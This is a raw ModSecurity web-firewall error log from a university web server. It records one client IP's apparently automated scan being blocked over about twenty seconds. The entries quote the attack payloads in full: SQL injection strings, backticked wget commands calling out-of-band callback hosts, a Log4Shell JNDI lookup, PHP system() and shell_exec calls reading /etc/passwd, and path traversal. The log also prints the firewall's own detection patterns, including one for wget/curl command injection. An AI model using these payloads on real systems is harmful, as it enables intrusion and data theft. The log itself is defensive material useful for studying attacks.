[Tue Aug 29 11:30:17.583059 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9277=9277 found within ARGS:debit: (CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10WcCo-f0AAAPENa4AAAAQ"]
[Tue Aug 29 11:30:19.584891 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:start_hour. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:start_hour: ;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/nightled.cgi"] [unique_id "ZO10W8Co-f0AAAN5YG0AAAAN"]
[Tue Aug 29 11:30:20.351780 2023] [:error] [pid 984] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpas_keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')/**/ found within ARGS:wpas_keys: 1')/**/AND/**/(SELECT/**/5202/**/FROM/**/(SELECT(SLEEP(6)))yRVR)/**/AND/**/('dwQZ'/**/LIKE/**/'dwQZ"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/wp-autosuggest/autosuggest.php"] [unique_id "ZO10XMCo-f0AAAPY1sAAAAAh"]
[Tue Aug 29 11:30:22.311705 2023] [:error] [pid 992] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/devices.inc.php"] [unique_id "ZO10XsCo-f0AAAPgCO8AAAAj"]
[Tue Aug 29 11:30:22.613582 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgkuq7idgi4qr5z.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/Collector/diagnostics/ping"] [unique_id "ZO10XsCo-f0AAAN5YIEAAAAN"]
[Tue Aug 29 11:30:23.322984 2023] [:error] [pid 904] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:email: 1' or sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/forgot_password.php"] [unique_id "ZO10X8Co-f0AAAOIvTcAAAAM"]
[Tue Aug 29 11:30:23.351285 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/account/index.php"] [unique_id "ZO10X8Co-f0AAANh1pwAAAAA"]
[Tue Aug 29 11:30:24.335347 2023] [:error] [pid 904] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: 1 AND (SELECT 1626 FROM (SELECT(SLEEP(6)))niPH)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10YMCo-f0AAAOIvToAAAAM"]
[Tue Aug 29 11:30:24.349745 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/opensis/index.php"] [unique_id "ZO10YMCo-f0AAAPENcEAAAAQ"]
[Tue Aug 29 11:30:25.311916 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10YcCo-f0AAAPMl-EAAAAY"]
[Tue Aug 29 11:30:25.574471 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-239}${:-529}.${hostName}.username.cjmn8l5jmimk2adbbnlg33joy556n7dxj.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO10YcCo-f0AAAPENcYAAAAQ"]
[Tue Aug 29 11:30:26.308432 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ant. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ant: echo md5(\\x22antproxy.php\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/.antproxy.php"] [unique_id "ZO10YsCo-f0AAANjpxcAAAAT"]
[Tue Aug 29 11:30:28.416766 2023] [:error] [pid 904] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "mbkm.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10ZMCo-f0AAAOIvUUAAAAM"]
[Tue Aug 29 11:30:28.426933 2023] [:error] [pid 904] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "mbkm.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10ZMCo-f0AAAOIvUUAAAAM"]
[Tue Aug 29 11:30:29.372481 2023] [:error] [pid 902] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:categoryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'zzz'='zzz found within ARGS:categoryId: 1' and updatexml(1,concat(0x7e,md5(999999999),0x7e),1) and 'zzz'='zzz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/cms/content/list"] [unique_id "ZO10ZcCo-f0AAAOGagQAAAAS"]
[Tue Aug 29 11:30:30.304576 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10ZsCo-f0AAAPDnwcAAAAP"]
[Tue Aug 29 11:30:30.507669 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10ZsCo-f0AAAOKNn4AAAAK"]
[Tue Aug 29 11:30:31.348224 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/lcms/index.php"] [unique_id "ZO10Z8Co-f0AAANh1rAAAAAA"]
[Tue Aug 29 11:30:32.655924 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:f_ntp_server. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:f_ntp_server: `curl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/system_mgr.cgi"] [unique_id "ZO10aMCo-f0AAAOM4WoAAAAU"]
[Tue Aug 29 11:30:33.414742 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  ../../../../../../../../../../../../ found within ARGS:subWidgets[0][config][code]: echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO10acCo-f0AAAPmhMIAAAAV"]
[Tue Aug 29 11:30:34.332122 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:search: \\x22;wget http:/cjmn8l5jmimk2adbbnlg1rijnhrks4wtk.oast.site';\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/search.php"] [unique_id "ZO10asCo-f0AAAOOuVwAAAAW"]
[Tue Aug 29 11:30:34.484531 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "mbkm.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPahwAAAAAL"]
[Tue Aug 29 11:30:34.490357 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "mbkm.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPahwAAAAAL"]
[Tue Aug 29 11:30:35.299855 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "212.69.30.170_dfd159e078f9d8064013e5bd9a8defa4d45f5f4a"): Internal error [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10asCo-f0AAAPENdoAAAAQ"]
[Tue Aug 29 11:30:35.372384 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:Logon. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:Logon: ';echo md5(TestPoc);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/mainfile.php"] [unique_id "ZO10a8Co-f0AAAPENdsAAAAQ"]
[Tue Aug 29 11:30:36.158969 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:username: ' Or 1-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/ccms/index.php"] [unique_id "ZO10bMCo-f0AAAOOuWEAAAAW"]
[Tue Aug 29 11:30:36.177008 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "mbkm.unla.ac.id"] [uri "/OA_HTML/BneViewerXMLService"] [unique_id "ZO10bMCo-f0AAAPENeAAAAAQ"]
[Tue Aug 29 11:30:37.322977 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailuid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:mailuid: admin' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/process/aprocess.php"] [unique_id "ZO10bcCo-f0AAAPDnyIAAAAP"]
[Tue Aug 29 11:30:37.577041 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_FILES[type][tmp_name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =@`\\x5c'` /*! found within ARGS:_FILES[type][tmp_name]: \\x5c' or mid=@`\\x5c'` /*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9#@`\\x5c'` "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/plus/recommend.php"] [unique_id "ZO10bcCo-f0AAAPiBhAAAAAB"]
[Tue Aug 29 11:30:37.583249 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:file: /../../../context/2UdxjXFelR2tZ4yJH19Hg6ZVriU.cfm"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/lucee/admin/imgProcess.cfm"] [unique_id "ZO10bcCo-f0AAAPpWdUAAAAI"]
[Tue Aug 29 11:30:37.617005 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--   found within ARGS:uid[1]: ) and updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/public/index.php/home/index/bind_follow/"] [unique_id "ZO10bcCo-f0AAAPMmBEAAAAY"]
[Tue Aug 29 11:30:37.658246 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 5"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/human.aspx"] [unique_id "ZO10bcCo-f0AAAPXAnQAAAAi"]
[Tue Aug 29 11:30:39.437571 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "mbkm.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAPpWd8AAAAI"]
[Tue Aug 29 11:30:39.439387 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "mbkm.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAPpWd8AAAAI"]
[Tue Aug 29 11:30:39.480795 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22PASSWORD\\x22},{\\x22name\\x22:\\x22device_id\\x22,\\x22value\\x22:\\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\\x22},{\\x22name\\x22:\\x22checked\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO10b8Co-f0AAAO877EAAAAF"]
